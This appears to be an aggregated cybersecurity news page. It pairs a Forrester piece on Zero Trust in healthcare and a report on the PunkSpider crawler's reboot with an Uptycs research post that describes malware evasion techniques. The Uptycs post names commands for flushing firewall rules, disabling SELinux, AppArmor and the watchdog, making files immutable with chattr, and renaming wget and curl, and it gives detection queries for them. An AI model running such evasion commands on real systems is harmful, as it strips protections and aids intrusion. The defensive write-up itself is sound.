Category: Cyber


Zero Trust For Healthcare Orgs Is Just What The Doctor Ordered

Whether it’s a ransomware attack, data breach, or another unnamed method that exposes and exploits private, sensitive, or proprietary data, 2021 is shaping up to be the “year of the breach” with healthcare orgs among the prime targets. Last week, Humana became the latest healthcare org to fall victim to cyberattack when hackers leaked medical data of over 6,000 patients, acquired through a third-party app for Medicaid Advantage members and agents.
In the first half of 2021, 360 breaches exposed almost 23 million patient records – which is higher than any other 6 month period since the US Health and Human Services Office for Civil Rights (OCR) began keeping track.  This shouldn’t come as a surprise because healthcare organizations:

Manage and store lots of valuable data; vast amounts of data is shared between an increasing number of physical and virtual entities both inside and outside the entities’ IT network.
Maintain large expanded third-party networks that can be exploited (physicians, researchers, business associates, insurers, payers, etc.).
Rely heavily on technology for virtual care, connected medical devices, diagnostics, and patient engagement.
Struggle to secure sensitive data as it flows between their hospital clinical engineering/IT networks, clinician remote access points, virtual care platforms, third-party healthcare partners, and even patient home networks.

The considerable amount of blind data sprawled across the healthcare ecosystem, sitting on flat, vulnerable networks with poor access controls has made healthcare the low-hanging fruit for hackers who’d rather work smarter, not harder.
While there’s no single remedy, adopting Forrester’s Zero Trust strategy can help most healthcare delivery organizations. In our recently published report,  The Zero Trust Security Architecture For Healthcare my colleague Alla Valente and I discuss how new risks the post-COVID delivery model puts Zero Trust front and center in healthcare delivery organizations. Among the recommendations are the need for an overarching security strategy, visibility into the risk associated with third-party party data sharing relationships, and accelerating innovation without jeopardizing safety, privacy, and security.
If you are responsible for security at a healthcare provider and would like to learn more about this, please schedule an inquiry call with myself or Alla today.


Six Malicious Linux Shell Scripts Used to Evade Defenses and How to Stop Them

Uptycs Threat Research outline how malicious Linux shell scripts are used to cloak attacks and how defenders can detect and mitigate against them.

Siddartha Sharma and Adhokshaj Mishra
Evasive techniques used by attackers, date back to the earlier days, when base64 and other common encoding schemes were used. Today, attackers are adopting new Linux shell script tactics and techniques to disable firewalls, monitoring agents and modifying access control lists (ACLs).
In previous Uptycs Threat Research posts, we discussed the common utilities in Linux, which are generally used by threat actors in the attack chain. In this report, we highlight those common defense evasion techniques, which are common in malicious Linux shell scripts. And then, we outline how Uptycs spots and mitigates against them.
In this post, we cover common evasive shell-script techniques as:

Uninstalling monitoring Agents
Disabling Firewalls and Interrupts
Disabling Linux Security Modules (LSMs)
Modifying ACLs
Changing Attributes
Renaming common Utilities

The hash 39ac019520a278e350065d12ebc0c24201584390724f3d8e0dc828664fee6cae will be used to demonstrate and explain these techniques.
Technique 1: Uninstalling monitoring Agents
Monitoring agents are the software components that regularly monitor the activities going on in the system related to process and network. Various logs are also created by the monitoring agents, which helps as an aid during any incident investigation.
The malicious script, we found in our in-house osquery based sandbox tries to:

Uninstall cloud related monitoring agent Aegis (Alibaba Cloud threat detection agent), stopping the Aliyun service.
Uninstall YunJing which is a host security agent from Tencent.

Uninstall BCM client management agent which is generally installed on Endpoints for risk mitigation.

Technique 2: Disabling Firewalls and Interrupts
Most of the systems and servers deploy firewalls as a defense mechanism.In the malicious script, attackers try to disable the firewall i.e., uninterrupted firewall (ufw) as a defense evasive tactic. Along with that, attackers also remove iptables rules (iptables -F) because it is widely used for managing the firewall rules on Linux systems and servers. (see figure 2)

Attackers also used the commands to disable non-maskable Interrupt(nmi). Watchdog is basically a configurable timer mechanism which generates interrupt at a particular given condition and time. In case of the system freeze, the nmi watchdog interrupt handler would kill the task which is responsible for the system freeze. To evade this defense mechanism, attackers disable watchdog feature using sysctl command or temporarily disabling it by setting the value to ‘0’. (see figure 3)

Technique 3: Disabling Linux Security Modules (LSMs)
The malicious shell script also disables Linux security modules like SElinux, Apparmor. These modules are designed to implement mandatory access control(MAC) policies. A server administrator could simply configure these modules to provide the users restricted access to the installed or running applications in the system.
AppArmour is a security feature in Linux which is used to lock down applications like Firefox for increased security. A user can restrict an application in Ubuntu’s default configuration by giving limited permission to a certain application.

SElinux is another security feature in Linux systems by which a security administrator could apply security context on certain applications and utilities. On some web servers, the shell is disabled or restricted so for RCE (Remote Code Execution) adversaries usually bypass/disable this:

Technique 4: Modifying ACLs
ACLs, or Access Control Lists, contain the rules by which permissions on files and utilities are granted. Filesystem ACLs tell operating systems which users can access the system, and what privileges the users are allowed. Setfacl utility in Linux is used to modify, remove the ACL, in the script we can see the usage of setfacl which sets permissions of chmod for the user:

Technique 5: Changing Attributes
Chattr in Linux is used to set/unset certain attributes of a file, more on chattr utility here. Adversaries use this for their own dropped files or to make their files immutable so that a user cannot delete it:

Another scenario:

Technique 6: Renaming common Utilities
One of the malicious scripts (d7c4693f4c36d8c06a52d8981827245b9ab4f63283907ef8c3947499a37eedc8) also contained common utilities like wget,curl used with different names. These utilities are generally used to download files from the remote IP. Attackers use these utilities to download malicious files from C2.Some of the security solutions whose detection rules monitor the exact names of the utilities might not trigger the download event if wget,curl are used under different names.

Uptycs EDR Detections
Uptycs EDR armed with YARA process scanning detected these malicious scripts with a threat score of 10/10.

Uptycs EDR Queries
Alongside the detections, Uptycs EDR also records all the events we mentioned above in the process_events table. Using the queries below, incident response analysts can easily identify such malicious events:
Firewall disabling
select * from process_events where exe_name = ‘ufw’;
ACL modification
select * from process_events where exe_name = ‘setfacl’;
Chattr utility usage
select * from process_events where exe_name = ‘chattr’ and cmdline = ‘chattr +ia /home/hilde/.ssh/authorized_keys2’;
Checking renamed common utilities (wget,curl)
select * from process_events where exe_name = ‘mv’;
As attackers are using more sophisticated and novel methods for evasion, it becomes increasingly important to monitor and record the activities happening in the system. Uptycs EDR offers the added benefit of taking a deep dive into the events logged, providing more insights of an attack. The reactive nature of Uptycs’ EDR helps to log everything whatever goes on in the system.
We recommend the following measures:

Regularly monitor the suspicious processes, events, and network traffic spawned on the execution of any untrusted binary.
Keep systems and firmware updated with the latest releases and patches.



Want to Learn More About How Uptycs Can Help Secure Your Linux Environments? Watch A 15-Minute Demo!


Reboot of PunkSpider Tool at DEF CON Stirs Debate

Researchers plan to introduce a revamp of PunkSpider, which helps identify flaws in websites so companies can make their back-end systems more secure, at DEF CON.

Researchers will release a reboot of a controversial tool that crawls the web to identify back-end vulnerabilities in websites in the hopes that companies will quickly fix them and reduce security risks.
However, experts have mixed feelings about the tool called PunkSpider, created by the analytics firm QOMPLX. They fear the tool could be hijacked by hackers to exploit vulnerabilities before companies have time to patch them.
Alejandro Caceres, director of computer network exploitation at QOMPLX, and hacker Jason Hopper will introduce a revamped version of PunkSpider at the upcoming DEF CON gathering next week.QOMPLX cited the rise of ransomware as one of the reasons for a reboot of PunkSpider, which provides “a simple and massively scalable monitoring tool that quickly identifies gaps in collective defenses by highlighting which websites can easily fall prey to attackers,” according to a press release.  The tool can provide internet users and the cyber community a “shared perspective” on the specific dangers of the web, the company said.
“We want everyone to be able to answer a simple question: how dangerous is the internet I use?” said Jason Crabtree, CEO of QOMPLX, said in a press statement “Our extensive research revealed a large but unfortunately not surprising number of basic vulnerabilities across the web. The common exploits that PunkSpider detects serve as a key proxy for risk overall, and frankly if website owners are not fixing the fundamentals it’s unlikely they’re fully addressing bigger vulnerabilities.”
Back by Popular Demand?
Caceres and Hopper said demand was another reason to update and reintroduce the tool after a years-long hiatus, adding that myriad issues and negative attention forced the tool, originally funded by the Defense Advanced Research Projects Agency, into hibernation.
“We’ve been getting asked a lot for ‘that tool that was like Shodan but for web app vulns,’” they wrote in a write-up for their session at DEF CON. “PunkSpider … was taken down a couple of years ago due to multiple … issues and threats. We weren’t sure in which direction to keep expanding, and it ended up being a nightmare to sustain.”
The new and improved PunkSpider is a “completely re-engineered” system that also expands the capabilities of the tool to find vulnerabilities, they wrote.
“It is not only far more efficient with real-time distributed computing and checks for way more vulns, we [also] had to take some creative ways through the woods,” Caceres and Hopper wrote.
The new tool in fact will have its own dedicated ISP and data center in Canada to integrate “freely available data that anyone can get but most don’t know is available,” they said. The data they refer to will be a massive collection of known web vulnerabilities.
Caceres and Hopper also plan to release tens of thousands of vulnerabilities at the conference and will ask for suggestions about what to search for to uncover even more.
Circa 2017: This message greeted visitors to PunkSpider’s website promoting its 3.0 version of its offensive cybersecurity testing tool.
Bug Bounty Bonanza?
As its creators know well, not everyone is thrilled about PunkSpider’s comeback, however.
In comments emailed to Wired, Electronic Frontier Foundation analyst Karen Gullo said that while the folks behind PunkSpider have “good intentions,” making the vulnerabilities public could backfire and have the opposite effect that its creators intended.
“Making them public might be the thing that pushes administrators to fix [these vulnerabilities]. But we don’t recommend it,” she told Wired. “Bad actors can exploit the vulnerabilities faster than administrators can plug them, leading to more breaches.”
And while many on Twitter have voiced support for the tool—with cybersecurity expert Stephen Frei observing that “you can’t manage what you can’t measure”– critics also took to the social-media platform to express consternation about PunkSpider.
One suggested that it may limit the opportunity for ethical hackers to win rewards for finding vulnerabilities that companies currently give them. “Ok so maybe I’m dumb but doesn’t a tool like this make bug bounties pointless?” questioned Twitter user @thedragonisreal.
A reply to the Tweet countered that PunkSpider certainly won’t pick up every vulnerability, so there will still be plenty for ethical hackers and researchers to dig up and submit to company’s vulnerability-reward programs.
Another Twitter user raised an ethical issue with the tool, suggesting it is needlessly calling out site insecurities without proof that companies respond accordingly and make necessary changes to protect themselves.
“Not sure if exposing sites like this is a good idea without data showing it lead to meaningful changes the first time around,” tweeted a user called @cypnk who is in the medical hardware industry. “If it didn’t, then it’s needlessly malicious.”Worried about where the next attack is coming from? We’ve got your back. REGISTER NOW for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this LIVE discussion.